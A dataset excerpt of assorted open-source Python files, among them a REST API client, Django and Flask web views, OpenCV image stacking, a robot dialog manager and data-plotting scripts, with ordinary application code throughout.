max_stars_repo_path (string, length 4-182) | max_stars_repo_name (string, length 6-116) | max_stars_count (int64, 0-191k) | id (string, length 7) | content (string, length 100-10k) | size (int64, 100-10k)
---|---|---|---|---|---|
cloudrunner/api/base.py | CloudRunnerIO/cloudrunner | 5 | 2168759 |
from copy import copy
import json
import logging
import requests
from exceptions import * # noqa
logging.basicConfig()
LOG = logging.getLogger("ApiClient")
LOG.setLevel(logging.INFO)
class ApiObject(object):
@classmethod
def _apify(cls, **kwargs):
return ApiObject(**kwargs)
def __init__(self, **kwargs):
self._values = kwargs
for k, v in kwargs.items():
if isinstance(v, dict):
setattr(self, k, self._apify(**v))
elif isinstance(v, (list, set, tuple)):
arr = []
for i in v:
if isinstance(i, dict):
arr.append(self._apify(**i))
else:
arr.append(i)
setattr(self, k, arr)
else:
setattr(self, k, v)
@classmethod
def type(cls):
return getattr(cls, '_type', cls.__name__.lower())
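# Illustrative sketch only (not part of the original module): ApiObject recursively wraps
# nested dicts, so a JSON payload can be read through attribute access.
#
#   obj = ApiObject(name="demo", owner={"email": "a@b.c"}, tags=[{"id": 1}, "plain"])
#   obj.name           # "demo"
#   obj.owner.email    # "a@b.c"   (nested dict wrapped into an ApiObject)
#   obj.tags[0].id     # 1         (dicts inside lists/sets/tuples are wrapped too)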
class ReqMixin(object):
def _request(self, method, path, *args, **kwargs):
headers = copy(self.auth)
if kwargs:
headers.update(kwargs)
if 'content_type' in headers:
headers['Content-Type'] = kwargs["content_type"]
else:
headers['Content-Type'] = "application/json"
try:
full_path = "/".join([self.path, path])
LOG.debug("Sending request to %s [%s]" % (full_path, kwargs))
res = requests.request(method, full_path, data=json.dumps(kwargs),
headers=headers)
LOG.debug(res)
if res.status_code == 401:
raise NotAuthorized()
if res.status_code == 302:
raise NotModified()
return res.json()
        except Exception as ex:
LOG.exception(ex)
return None
class ResourceManager(ReqMixin):
def __init__(self, path, models, wrapper=None, selector=None, suffix=None):
self.app_path = path
if isinstance(models, (set, list, tuple)):
self.models = models
self.mixed = True
else:
self.models = [models]
self.mixed = False
self.wrapper = wrapper
self.selector = selector
self.suffix = suffix
def _unwrap(self, res):
items = []
if self.mixed:
tokens = self.wrapper.split(".")
data = res
for t in tokens:
data = data[t]
for model in self.models:
_wrapper = getattr(model, 'wrapper', model.type()).lower()
_wrapper = "%s%s" % (_wrapper, self.suffix)
if _wrapper in data:
for i in data[_wrapper]:
items.append(model(**i))
else:
_wrapper = self.wrapper or self.models[0].type()
tokens = _wrapper.split(".")
data = res
for t in tokens:
data = data[t]
if isinstance(data, (set, list, tuple)):
for item in data:
items.append(self.models[0](**item))
else:
return self.models[0](**data)
return items
def _get_selector(self, api):
if self.selector:
urlargs = str(getattr(api, self.selector))
if not urlargs:
urlargs = getattr(api, 'id') or ''
urlargs = str(urlargs)
return urlargs
def list(self, *args, **kwargs):
res = self._request('get', '/'.join([self.app_path] + list(args)),
**kwargs)
items = []
items = self._unwrap(res)
return items
def item(self, *args, **kwargs):
if args and isinstance(args[0], ApiObject):
api = args[0]
urlargs = self._get_selector(api)
else:
urlargs = "/".join(args)
res = self._request('get', '/'.join([self.app_path, urlargs]),
**kwargs)
LOG.debug(res)
items = []
items = self._unwrap(res)
return items
def add(self, model):
res = self._request('post', self.app_path, **model._values)
if res.get('success'):
return True
else:
return "ERROR: " % res.get("error", {}).get("msg")
def update(self, key, model):
res = self._request(
'get', '/'.join([self.app_path, key]), **model._values)
if res.get('success'):
return True
else:
return "ERROR: " % res.get("error", {}).get("msg")
def replace(self, key, model):
        res = self._request('put', '/'.join([self.app_path, key]), **model._values)
if res.get('success'):
return True
else:
return "ERROR: " % res.get("error", {}).get("msg")
def remove(self, key):
if isinstance(key, ApiObject):
name = key.name
else:
name = key
res = self._request('delete', '/'.join([self.app_path, name]))
if res.get('success'):
return True
else:
return "ERROR: %s" % res.get("error", {}).get("msg")
_REST__subclasses = []
class RESTfulType(type):
def __init__(cls, name, bases, dct):
        global _REST__subclasses
if name == "RESTResource":
cls._subclasses = _REST__subclasses
else:
for base in bases:
if base.__name__ == "RESTResource":
_REST__subclasses.append(cls)
cls._resources = []
for k, v in dct.items():
if isinstance(v, ResourceManager):
cls._resources.append(v)
super(RESTfulType, cls).__init__(name, bases, dct)
def __call__(cls, *args, **kwargs):
obj = super(RESTfulType, cls).__call__(*args, **kwargs)
return obj
class RESTResource(ReqMixin):
__metaclass__ = RESTfulType
def __init__(self, auth=None, path=None):
self.auth = auth
self.path = path
for res in self._resources:
res.auth = self.auth
res.path = self.path
@classmethod
def __subclasses__(cls):
        return cls._subclasses
| 6,228 |
scripts/ais_nmea_uscg_timeshift.py | rolker/noaadata | 35 | 2169536 |
#!/usr/bin/env python
"""Calculate the within minute slew of the USCG timestamp compared to
the extended "T" time within the minute. I hope this comes from the
receiver GPS time and not from AISLogger. Actually, this just shows
that they all move together. I thought that this was done by the
receiver, but no, it appears to be done by the java logging code.
"""
import datetime
import sys
import ais.ais_msg_1_handcoded as ais_msg_1
import ais.ais_msg_4_handcoded as ais_msg_4
from aisutils.uscg import uscg_ais_nmea_regex
from aisutils import binary
print '* emacs org-mode table'
print '#+ATTR_HTML: border="1" rules="all" frame="all"'
print '|USCG datetime| cg s | dt cg s | T | dT | t | S | slot t |',
print 'msg slot num | msg slot t|msg hour| msg min | msg sec | MMSI |'
all_keys = set()
cg_s_prev = None
time_of_arrival_prev = None
for line in file(sys.argv[1]):
line = line.rstrip()
if len(line) < 5 or 'AIVDM' not in line:
continue
match = uscg_ais_nmea_regex.search(line).groupdict()
cg_s = float(match['timeStamp'])
uscg = datetime.datetime.utcfromtimestamp(float(match['timeStamp']))
if cg_s_prev is not None:
dt = cg_s - cg_s_prev
dt = '%5d' % dt
else:
dt = 'N/A'.rjust(5)
cg_s_prev = cg_s
try:
time_of_arrival = float(match['time_of_arrival'])
except:
time_of_arrival = None
if time_of_arrival is None:
dt_time_of_arrival = 'N/A'.rjust(8)
else:
if time_of_arrival_prev is not None:
dt_time_of_arrival = time_of_arrival - time_of_arrival_prev
dt_time_of_arrival = '%8.4f' % dt_time_of_arrival
else:
dt_time_of_arrival = 'N/A'.rjust(8)
time_of_arrival_prev = time_of_arrival
try:
slot_num = int(match['slot'])
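        # An AIS SOTDMA frame is 60 s long and holds 2250 slots, so the slot number
        # maps to seconds within the minute as slot_num * 60 / 2250.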
slot_t = slot_num / 2250. * 60
slot_t = '%5.2f' % slot_t
except:
slot_num = 'N/A'
slot_t = 'N/A'
print '|',uscg,'|',cg_s,'|',dt,'|',time_of_arrival,'|', dt_time_of_arrival,'|', match['t_recver_hhmmss'], '|',slot_num, '|',slot_t , '|',
if match['body'][0] in ('1','2','3'):
bits = binary.ais6tobitvec(match['body'])
msg = ais_msg_1.decode(bits)
#print msg.keys()
#all_keys.update(set(msg.keys()))
msg_slot = 'N/A'
if 'slot_number' not in msg:
msg['slot_number'] = 'N/A'
msg['slot_time'] = 'N/A'
else:
msg['slot_time'] = msg['slot_number'] / 2250. * 60
if 'commstate_utc_hour' not in msg:
msg['commstate_utc_hour'] = msg['commstate_utc_min'] = 'N/A'
print '{slot_number}|{slot_time}|{commstate_utc_hour}|{commstate_utc_min}|{TimeStamp}|{UserID}|'.format(**msg)
elif match['body'][0] == '4':
bits = binary.ais6tobitvec(match['body'])
msg = ais_msg_4.decode(bits)
all_keys.update(set(msg.keys()))
#print msg
msg_slot = 'N/A'
if 'slot_number' not in msg:
msg['slot_number'] = 'N/A'
msg['slot_time'] = 'N/A'
else:
msg['slot_time'] = msg['slot_number'] / 2250. * 60
#print '|',uscg,'|',cg_s,'|',dt,'|',time_of_arrival,'|', dt_time_of_arrival,'|', match['t_recver_hhmmss'], '|',slot_num, '|','%5.2f' % slot_t , '|',
print '{slot_number}|{slot_time}|{Time_hour}|{Time_min}|{Time_sec}| b{UserID}|'.format(**msg)
else:
print '|'*6
pass
#print all_keys
| 3,460 |
lib/fs_btrfs.py | hoefkensj/BTRWin | 0 | 2170966 |
#!/usr/bin/env python
import os
def create_subv(parent,name):
"""
:param parent:
:param name:
:return:
"""
import btrfsutil
subv=os.path.join(parent, name)
btrfsutil.create_subvolume(subv)
install_btrfs_subv_meta(subv)
return subv
def del_subv(parent,name):
"""
:param parent:
:param name:
:return:
"""
import btrfsutil
subv=os.path.join(parent, name)
deleted=btrfsutil.delete_subvolume(subv)
return deleted
def create_snapshot(parent,src,dst):
"""
:param parent:
:param src:
:param dst:
:return:
"""
import btrfsutil
subv_src=os.path.join(parent, src)
subv_dst=os.path.join(parent, dst)
btrfsutil.create_snapshot(subv_src,subv_dst)
return
def get_subvs(parent):
"""
:param parent:
:return:
"""
import btrfsutil
#ls_dirs=[os.path.join(parent, name) for name in os.listdir(parent) if os.path.isdir(os.path.join(parent, name))]
    return [directory for directory in os.listdir(parent) if btrfsutil.is_subvolume(os.path.join(parent, directory))]
def install_btrfs_subv_meta(subv):
"""
:param subv:
:return:
"""
ini=os.path.join(subv, 'desktop.ini')
dot=os.path.join(subv, '.directory')
bang=os.path.join(subv, f'.!{subv.split("/")[-1].upper()}!.')
with open(ini, 'w') as file:
        contents = '[.ShellClassInfo]\r\nIconResource=C:\\Windows\\System32\\SHELL32.dll,7'
file.write(contents)
with open(dot, 'w') as file:
contents=f'[Desktop Entry]\nIcon=drive-partition'
file.write(contents)
with open(bang, 'w') as file:
contents=f'# {subv.split("/")[-1].upper()}\n[Desktop Entry]\nIcon=drive-partition'
file.write(contents)
| 1,550 |
demisto_sdk/tests/integration_tests/run_integration_test.py | kfirstri/demisto-sdk | 0 | 2169954 |
import pytest
from click.testing import CliRunner
from demisto_client.demisto_api import DefaultApi
from demisto_sdk.__main__ import main
from demisto_sdk.commands.common.legacy_git_tools import git_path
from demisto_sdk.commands.run_cmd.runner import Runner
DEBUG_FILE_PATH = f'{git_path()}/demisto_sdk/commands/run_cmd/tests/test_data/kl-get-component.txt'
YAML_OUTPUT = """arguments: []
name: kl-get-records
outputs:
- contextPath: Keylight.ID
description: ''
type: Number
- contextPath: Keylight.Name
description: ''
type: String
- contextPath: Keylight.ShortName
description: ''
type: String
- contextPath: Keylight.SystemName
description: ''
type: String"""
@pytest.fixture
def set_environment_variables(monkeypatch):
# Set environment variables required by runner
monkeypatch.setenv('DEMISTO_BASE_URL', 'http://demisto.instance.com:8080/')
monkeypatch.setenv('DEMISTO_API_KEY', 'API_KEY')
monkeypatch.delenv('DEMISTO_USERNAME', raising=False)
monkeypatch.delenv('DEMISTO_PASSWORD', raising=False)
def test_integration_run_non_existing_command(mocker, set_environment_variables):
"""
Given
- Non-existing command to run.
- Debug and Verbose option to increase coverage
When
- Running `run` command.
Then
- Ensure output is the appropriate error.
"""
mocker.patch.object(DefaultApi, 'investigation_add_entries_sync', return_value=None)
mocker.patch.object(Runner, '_get_playground_id', return_value='pg_id')
result = CliRunner(mix_stderr=False, ).invoke(main, ['run', '-q', '!non-existing-command', '-D', '-v'])
assert 0 == result.exit_code
assert not result.exception
assert 'Command did not run, make sure it was written correctly.' in result.output
assert not result.stderr
def test_json_to_outputs_flag(mocker, set_environment_variables):
"""
Given
- kl-get-components command
When
- Running `run` command on it with json-to-outputs flag.
Then
- Ensure the json_to_outputs command is running correctly
"""
# mocks to allow the command to run locally
mocker.patch.object(Runner, '_get_playground_id', return_value='pg_id')
mocker.patch.object(Runner, '_run_query', return_value=['123'])
# mock to get test log file
mocker.patch.object(DefaultApi, 'download_file', return_value=DEBUG_FILE_PATH)
# mock to set prefix instead of getting it from input
command = '!kl-get-records'
run_result = CliRunner(mix_stderr=False, ).invoke(main, ['run', '-q', command, '--json-to-outputs', '-p', 'Keylight', '-r'])
assert 0 == run_result.exit_code
assert not run_result.exception
assert YAML_OUTPUT in run_result.stdout
assert not run_result.stderr
def test_json_to_outputs_flag_fail_no_prefix(mocker, set_environment_variables):
"""
Given
- kl-get-components command
When
- Running `run` command on it with json-to-outputs flag and no prefix argument
Then
- Ensure the json_to_outputs command is failing due to no prefix argument provided.
"""
# mocks to allow the command to run locally
mocker.patch.object(Runner, '_get_playground_id', return_value='pg_id')
mocker.patch.object(Runner, '_run_query', return_value=['123'])
# mock to get test log file
mocker.patch.object(DefaultApi, 'download_file', return_value=DEBUG_FILE_PATH)
# mock to set prefix instead of getting it from input
command = '!kl-get-records'
run_result = CliRunner(mix_stderr=False, ).invoke(main, ['run', '-q', command, '--json-to-outputs'])
assert 1 == run_result.exit_code
assert 'A prefix for the outputs is needed for this command. Please provide one' in run_result.stdout
assert not run_result.stderr
| 3,794 |
hello.py | MockArch/bob_login_page | 0 | 2170585 |
from flask import Flask, render_template, request, jsonify
import atexit
import cf_deployment_tracker
import os
import json
from mongo import Conn
# Emit Bluemix deployment event
cf_deployment_tracker.track()
app = Flask(__name__)
port = int(os.getenv('PORT', 8000))
@app.route('/')
def home():
return render_template('index.html')
@app.route('/api/visitors', methods=['GET'])
def get_visitor():
return jsonify(list(map(lambda doc: doc['name'], Conn().user_info.find({}))))
@app.route('/api/visitors', methods=['POST'])
def put_visitor():
user = request.json['name']
data = {'name':user}
Conn().user_info.insert_one(data)
return 'Hello %s! I added you to the database.' % user
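# Example requests against the two /api/visitors routes above (assuming the default
# port 8000 and a reachable MongoDB behind Conn()):
#   curl http://localhost:8000/api/visitors
#   curl -X POST -H "Content-Type: application/json" -d '{"name": "Ada"}' \
#        http://localhost:8000/api/visitors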
if __name__ == '__main__':
app.run(host='0.0.0.0', port=port, debug=True)
| 794 |
OpenCV-Python/Basics/Joining_Multiple_Images_To_Display.py | mehulcparikh/ComputerVision | 0 | 2169480 |
####################### STACKING USING THE FUNCTION #####################
import cv2
import numpy as np
frameWidth = 640
frameHeight = 480
cap = cv2.VideoCapture(0)
cap.set(3, frameWidth)
cap.set(4, frameHeight)
def stackImages(imgArray,scale,lables=[]):
sizeW= imgArray[0][0].shape[1]
sizeH = imgArray[0][0].shape[0]
rows = len(imgArray)
cols = len(imgArray[0])
rowsAvailable = isinstance(imgArray[0], list)
width = imgArray[0][0].shape[1]
height = imgArray[0][0].shape[0]
if rowsAvailable:
for x in range ( 0, rows):
for y in range(0, cols):
imgArray[x][y] = cv2.resize(imgArray[x][y], (sizeW, sizeH), None, scale, scale)
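                # Grayscale frames are promoted to 3-channel BGR below so that
                # np.hstack/np.vstack can combine them with the colour images.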
if len(imgArray[x][y].shape) == 2: imgArray[x][y]= cv2.cvtColor( imgArray[x][y], cv2.COLOR_GRAY2BGR)
imageBlank = np.zeros((height, width, 3), np.uint8)
hor = [imageBlank]*rows
hor_con = [imageBlank]*rows
for x in range(0, rows):
hor[x] = np.hstack(imgArray[x])
hor_con[x] = np.concatenate(imgArray[x])
ver = np.vstack(hor)
ver_con = np.concatenate(hor)
else:
for x in range(0, rows):
imgArray[x] = cv2.resize(imgArray[x], (sizeW, sizeH), None, scale, scale)
if len(imgArray[x].shape) == 2: imgArray[x] = cv2.cvtColor(imgArray[x], cv2.COLOR_GRAY2BGR)
hor= np.hstack(imgArray)
hor_con= np.concatenate(imgArray)
ver = hor
if len(lables) != 0:
eachImgWidth= int(ver.shape[1] / cols)
eachImgHeight = int(ver.shape[0] / rows)
print(eachImgHeight)
for d in range(0, rows):
for c in range (0,cols):
cv2.rectangle(ver,(c*eachImgWidth,eachImgHeight*d),(c*eachImgWidth+len(lables[d][c])*13+27,30+eachImgHeight*d),(255,255,255),cv2.FILLED)
cv2.putText(ver,lables[d][c],(eachImgWidth*c+10,eachImgHeight*d+20),cv2.FONT_HERSHEY_COMPLEX,0.7,(255,0,255),2)
return ver
while True:
success, img = cap.read()
kernel = np.ones((5,5),np.uint8)
print(kernel)
#path = "Resources/lena.png"
#img = cv2.imread(path)
imgGray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
imgBlur = cv2.GaussianBlur(imgGray,(7,7),0)
imgCanny = cv2.Canny(imgBlur,100,200)
imgDilation = cv2.dilate(imgCanny,kernel , iterations = 2)
imgEroded = cv2.erode(imgDilation,kernel,iterations=2)
#imgBlank = np.zeros((200,200),np.uint8)
StackedImages = stackImages(([img,imgGray,imgBlur],
[imgCanny,imgDilation,imgEroded]),0.6)
cv2.imshow("Staked Images", StackedImages)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
################### Stacking images without Function ################
# import cv2
# import numpy as np
# img1 = cv2.imread('../Resources/lena.png',0)
# img2 = cv2.imread('../Resources/land.jpg')
# print(img1.shape)
# print(img2.shape)
# img1 = cv2.resize(img1, (0, 0), None, 0.5, 0.5)
# img2 = cv2.resize(img2, (0, 0), None, 0.5, 0.5)
# img1 = cv2.cvtColor(img1, cv2.COLOR_GRAY2BGR)
# hor= np.hstack((img1, img2))
# ver = np.vstack((img1, img2))
# cv2.imshow('Vertical', ver)
# cv2.imshow('Horizontal', hor)
# cv2.waitKey(0)
| 3,209 |
sales/migrations/0013_auto_20200919_1519.py | zhou-en/turf_portal | 0 | 2170642 |
# Generated by Django 3.1.1 on 2020-09-19 15:19
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('sales', '0012_order_closed_date'),
]
operations = [
migrations.AddField(
model_name='buyer',
name='status',
field=models.CharField(choices=[('ACTIVE', 'Active'), ('INACTIVE', 'Inactive')], default='ACTIVE', max_length=255),
),
migrations.AlterField(
model_name='order',
name='status',
field=models.CharField(choices=[('DRAFT', 'Draft'), ('SUBMITTED', 'Submitted'), ('INVOICED', 'Invoiced'), ('DELIVERED', 'Delivered'), ('CLOSED', 'Closed')], default='DRAFT', max_length=255),
),
]
| 761 |
App-Launcher/lib/dialog_manager.py | SoftBankRoboticsEurope/app-launcher | 4 | 2164356 |
# -*- coding: utf-8 -*-
import qi
class DialogManager:
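    # Maps locale identifiers (e.g. "en_US") to the three-letter language codes
    # that ALDialog expects (e.g. "enu").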
_LANGUAGE_FORMAT_CONVERSION = dict(en_US="enu", fr_FR="frf", ja_JP="jpj", zh_CN="mnc",
es_ES="spe", de_DE="ged", ko_KR="kok", it_IT="iti", nl_NL="dun",
fi_FI="fif", pl_PL="plp", ru_RU="rur", tr_TR="trt",
ar_SA="arw", cs_CZ="czc", pt_PT="ptp", pt_BR="ptb",
sv_SE="sws", da_DK="dad", nn_NO="nor", el_GR="grg")
def __init__(self, logger, session, pref_manager, pages_definition_property, autonomous_enabled_property,
current_page_property):
self._logger = logger
self._session = session
self._logger.info("@ Creating Dialog manager...")
self._pref_manager = pref_manager
self._pages_definition = pages_definition_property
self._current_language = None
self._current_language_dlg = None
self._current_page = current_page_property
self._autonomous_enabled = autonomous_enabled_property
self._connection_pagedef = self._pages_definition.connect(self._create_pages_triggers_dialog)
self._session.waitForService("ALTextToSpeech")
self._tts = self._session.service("ALTextToSpeech")
self._on_language_changed(self._tts.locale())
self._con_language = self._tts.languageTTS.connect(self._on_language_changed)
qi.async(self._create_pages_triggers_dialog, self._pages_definition.value(), delay=1000000)
self._pref_dialog_always_running = self._pref_manager.get_value('dialogAlwaysRunning', True)
self.connection_autoena = self._autonomous_enabled.connect(self._on_autonomous_enabled_changed)
self._session.waitForService("ALMemory")
self.page_subscriber = self._session.service("ALMemory").subscriber("AppLauncher/PageRequired")
self.page_connection = self.page_subscriber.signal.connect(self.on_page_required)
self._logger.info("@ Dialog manager created!")
def cleanup(self):
self._logger.info("@ Cleaning dialog manager...")
try:
self._tts.languageTTS.disconnect(self._con_language)
self.page_subscriber.signal.disconnect(self.page_connection)
self._pages_definition.disconnect(self._connection_pagedef)
self._autonomous_enabled.disconnect(self.connection_autoena)
except Exception as e:
self._logger.info("@ Error while cleaning dialog manager: {}".format(e))
self._logger.info("@ Dialog manager is clean!")
def _create_pages_triggers_dialog(self, pages_definition):
self._logger.info("@ Updating dialog concept for pages")
page_name_list = []
for page_id in pages_definition.keys():
page_name = pages_definition[page_id]["title"]
page_name_list.append(page_name)
self._session.waitForService("ALDialog")
dialog = self._session.service("ALDialog")
dialog.setConcept("applauncher_pages_names", self._current_language_dlg, page_name_list)
self._logger.info("@ Pages are: {}".format(page_name_list))
def _on_language_changed(self, new_language):
self._logger.info("@ Language is now: {}".format(new_language))
self._current_language_pkg = new_language
self._current_language_dlg = self._LANGUAGE_FORMAT_CONVERSION[self._current_language_pkg]
def _on_autonomous_enabled_changed(self, enabled):
try:
forbidden = True
life = self._session.service("ALAutonomousLife")
if enabled:
forbidden = False
self._logger.info("@ Autonomous: {} (forbidden: {})".format(enabled, forbidden))
life._forbidAutonomousInteractiveStateChange(forbidden)
if forbidden:
self._stop_dialog()
else:
self._start_dialog()
except Exception as e:
self._logger.info("@ Error while changing automous mode: {}".format(e))
def _start_dialog(self):
try:
if self._pref_dialog_always_running:
self._logger.info("@ dialogAlwaysRunning: True -> starting dialog")
life = self._session.service("ALAutonomousLife")
mem = self._session.service("ALMemory")
mem.insertData("Dialog/DoNotStop", 1)
life.switchFocus("run_dialog_dev/.")
except Exception as e:
self._logger.error("@ Run dialog error: " + str(e))
def _stop_dialog(self):
try:
bm = self._session.service("ALBehaviorManager")
bm.stopBehavior("run_dialog_dev/.")
except Exception as e:
self._logger.error("@ Stop dialog error: " + str(e))
def on_page_required(self, page_request):
if page_request == "homepage":
self._current_page.setValue("Home")
return
list_page = self._pages_definition.value()
for page_id in list_page.keys():
if page_request in list_page[page_id]["title"]:
self._current_page.setValue(page_id)
return
| 5,187 |
nomadgram/images/views.py | zlyanz13/Yonwongram | 0 | 2170189 |
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from . import models, serializers
from nomadgram.users import models as user_models
from nomadgram.locations import models as location_models
from nomadgram.users import serializers as user_serializers
# Create your views here.
class Images(APIView):
def get(self, request, format=None):
user = request.user
following_users = user.following.all()
image_list = []
for following_user in following_users:
user_images = following_user.images.all()[:2]
for image in user_images:
image_list.append(image)
my_images = user.images.all()[:2]
for image in my_images:
image_list.append(image)
sorted_list = sorted(image_list, key =lambda image: image.created_at, reverse= True)
serializer = serializers.ImageSerializer(sorted_list, many = True, context={'request' : request})
return Response(serializer.data)
def post(self, request, format=None):
user = request.user
data = request.data
print(data)
station_nm = data.get("station")
location = data.get("location")
stars = int('0'+data.get("stars"))
caption = data.get("caption")
tags = data.get("tags")
file = data.get("file")
        try:
            location_obj = location_models.Location.objects.get(
                station__station_nm=station_nm,
                name=location)
            print('location found', location_obj)
        except location_models.Location.DoesNotExist:
            station = location_models.Station.objects.filter(station_nm=station_nm).order_by('line_num')[0]
            location_obj = location_models.Location.objects.create(
                name=location,
                station=station)
        models.Image.objects.create(file=file, location=location_obj,
                                    stars=stars, tags=tags, caption=caption, creator=user)
        return Response(None, status=status.HTTP_201_CREATED)
"""user = request.user
serializer = serializers.InputImageSerializer(data=request.data)
if serializer.is_valid():
serializer.save(creator = user)
return Response(data = serializer.data, status= status.HTTP_201_CREATED)
else :
return Response(data = serializer.errors, status=status.HTTP_400_BAD_REQUEST)"""
class LikeImage(APIView):
def get(self, request, image_id, format= None):
likes = models.Like.objects.filter(image__id=image_id)
like_creator_ids = likes.values('creator_id')
users = user_models.User.objects.filter(id__in = like_creator_ids)#id__in mean search inside a Array
serializer = user_serializers.ListUserSerializer(users, many=True, context={"request": request})
return Response(data =serializer.data, status= status.HTTP_200_OK)
def post(self, request, image_id, format = None):
user = request.user
try:
found_image = models.Image.objects.get(id=image_id)
except models.Image.DoesNotExist:
return Response(status=404)
try :
preexisting_like = models.Like.objects.get(
creator = user,
image = found_image
)
return Response(status=status.HTTP_304_NOT_MODIFIED)
except models.Like.DoesNotExist:
new_like = models.Like.objects.create(
creator = user,
image = found_image
)
new_like.save()
return Response(status = status.HTTP_200_OK)
class UnLikeImage(APIView):
def delete(self, request, image_id, format = None) :
user = request.user
try:
found_image = models.Image.objects.get(id=image_id)
except models.Image.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
try :
preexisting_like = models.Like.objects.get(
creator = user,
image = found_image
)
preexisting_like.delete()
return Response(status = status.HTTP_204_NO_CONTENT)
except models.Like.DoesNotExist:
return Response(status=status.HTTP_304_NOT_MODIFIED)
class CommentOnImage(APIView):
    def post(self, request, image_id, format=None):
user = request.user
try:
found_image = models.Image.objects.get(id=image_id)
except models.Image.DoesNotExist:
return Response(status=404)
serializer = serializers.CommentSerializer(data=request.data)
if serializer.is_valid():
serializer.save(creator=user, image = found_image)
return Response(data=serializer.data, status =201)
else:
return Response(data = serializer.errors, status = 400)
class Comment(APIView):
    def delete(self, request, comment_id, format=None):
try:
comment = models.Comment.objects.get(id=comment_id, creator=request.user)
comment.delete()
return Response(status=204)
except models.Comment.DoesNotExist :
return Response(status=404)
class Search(APIView):
def get(self, request, format=None):
hashtags = request.query_params.get('hashtags', None)
if hashtags is not None :
hashtags = hashtags.split(",")
images = models.Image.objects.filter(tags__name__in = hashtags).distinct()
serializer = serializers.ImageSerializer(images, many=True, context={'request' : request})
return Response(data = serializer.data, status= status.HTTP_200_OK)
else :
images = models.Image.objects.all()[:20]
serializer = serializers.ImageSerializer(images, many=True, context={'request' : request})
return Response(data = serializer.data, status= status.HTTP_200_OK)
class ModerateComment(APIView):
def delete(self, request, image_id, comment_id, format=None):
user = request.user
try :
comment_to_delete = models.Comment.objects.get(id=comment_id, image__id = image_id, image__creator= user)
comment_to_delete.delete()
except models.Comment.DoesNotExist :
return Response(status= status.HTTP_404_NOT_FOUND)
return Response(status = status.HTTP_204_NO_CONTENT)
class ImageDetail(APIView):
def find_own_image(self, image_id, user):
try:
image = models.Image.objects.get(id=image_id, creator = user)
return image
except models.Image.DoesNotExist :
return None
def get(self, request, image_id, format =None ):
try :
image = models.Image.objects.get(id=image_id)
        except models.Image.DoesNotExist:
return Response(status= status.HTTP_404_NOT_FOUND)
serializer = serializers.ImageSerializer(image, context={'request' : request})
return Response(serializer.data, status=status.HTTP_200_OK)
def put(self, request, image_id, format = None):
user = request.user
image = self.find_own_image(image_id, user)
if image is None :
return Response(status= status.HTTP_400_BAD_REQUEST)
serializer = serializers.InputImageSerializer(image, data = request.data, partial = True )
if serializer.is_valid():
serializer.save(creator = user)
return Response(data = serializer.data, status= status.HTTP_204_NO_CONTENT)
else :
return Response(data = serializer.errors, status = status.HTTP_400_BAD_REQUEST)
def delete(self, request, image_id, format=None):
user = request.user
image = self.find_own_image(image_id, user)
if image is None :
return Response(status= status.HTTP_400_BAD_REQUEST)
image.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
"""
def get_key(image):
return image.created_at
class ListAllImages(APIView):
def get(self, request, format=None):
all_images = models.Image.objects.all()
serializer = serializers.ImageSerializer(all_images, many = True)
return Response(data = serializer.data)
class ListAllComments(APIView):
def get(self, request, format = None):
user_id = request.user.id
all_comments = models.Comment.objects.filter(creator = user_id)
serializer = serializers.CommentSerializer(all_comments, many = True)
return Response(data = serializer.data)
class ListAllLikes(APIView):
def get(self, request, format = None):
all_likes = models.Like.objects.all()
serializer = serializers.LikeSerializer(all_likes, many = True)
return Response(data = serializer.data)
"""
| 9,270 |
settings.py | epictaco302/epictacos-website | 0 | 2170172 |
# Default settings file for the website
PORT = 80
ENABLE_HTTPS = False
ENABLE_LOGGING = False
SERVE_STATIC = False
SERVE_STORAGE = False
CERT_DIR = 'path/to/cert'
CERT_ROOT = 'CERT_ROOT'
TARGET_HOST = 'hiden.ooguy.com'
# Import settings from settings_local.py. If settings_local.py is not present, terminate
try:
from settings_local import *
except ImportError:
raise Exception("Please create settings_local.py")
| 429 |
network.py | rebeling/networking | 1 | 2168799 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import json
from graph import marathon_graph
from marathon import MarathonClient
def generate_network_graph():
"""
1. connect to client, vpn must be on
    2. transform marathon app list into networkx graph
3. save graph to file
4. serve the graph with d3 frontend
"""
from secrets import USERNAME, PASSWORD, MARATHON_URL
mc = MarathonClient(MARATHON_URL, username=USERNAME, password=PASSWORD)
print "Initilized {}\niterating apps...".format(mc)
result = marathon_graph(mc.list_apps())
result["MARATHON_URL"] = MARATHON_URL
filename = 'graphFile.json'
with open('visualization/{}'.format(filename), 'w') as f:
json.dump(result, f, indent=4)
print "Done."
if __name__ == "__main__":
generate_network_graph()
| 835 |
mz-funnel-chart-plotly/dash/app.py | dunithd/edu-samples | 9 | 2170096 |
import psycopg2
import pandas.io.sql as sqlio
import pandas as pd
import dash
from dash import dcc
from dash import html
import plotly.express as px
app = dash.Dash(__name__)
# Connect to Materialize as a regular database
conn = psycopg2.connect("dbname=materialize user=materialize port=6875 host=localhost")
# Read the materialized view with Pandas
sql = "select * from consolidated_funnel order by cnt desc;"
df = pd.read_sql_query(sql, conn)
# Plot a funnel chart
fig = px.funnel(df, x="step", y="cnt")
# Main UI scaffolding for the dashboard
app.layout = html.Div(children=[
html.H1(children='Conversion Funnel'),
html.Div(children='''
Dash: A web application framework for your data.
'''),
dcc.Graph(
id='funnel-chart',
figure=fig
)
])
if __name__ == '__main__':
app.run_server(debug=True)
conn = None
| 866 |
scripts/displacement.py | Psirus/altay | 0 | 2170395 |
import os
import sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
from altai.lib import driver_database
from altai.lib import vented_box
from altai.lib import speaker
import matplotlib.pyplot as plt
import numpy as np
driver_db = driver_database.DriverDB.from_file('../altai/lib/driver_db.json')
driver = driver_db[0]
box = vented_box.VentedBox(Vab=90.0, fb=40.0, Ql=20.0)
speaker = speaker.VentedSpeaker(driver, box)
freqs, displacement = speaker.displacement()
plt.semilogx(freqs, displacement)
plt.show()
| 549 |
RFACA/foldx/foldx_results.py | JinyuanSun/my_bio_script | 0 | 2169824 |
#!/usr/bin/python
#By <NAME> and <NAME>, 2021
import pandas as pd
import argparse
parser = argparse.ArgumentParser(description=
'Process files from previous foldx scan')
parser.add_argument("-sn", '--subdirnum', help="Total number of subdirectories")
